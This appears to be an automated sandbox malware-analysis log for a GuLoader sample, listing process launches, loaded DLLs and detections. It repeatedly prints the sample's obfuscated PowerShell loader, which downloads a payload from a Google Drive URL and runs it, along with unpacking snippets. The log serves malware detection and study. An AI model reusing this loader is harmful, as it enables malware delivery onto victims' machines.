Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneo", "0")
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.1750338876.000000000D2B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1739244674.00000000086B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hucksterise42 $snoende $Catholicising), (Ophoejede @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Independentism = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cetiosauria)), $Udregnendes).DefineDynamicModule($Unguilefulness, $false).DefineType($Brrups, $Phoh, [System.MulticastDelegate])$Sejlk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds 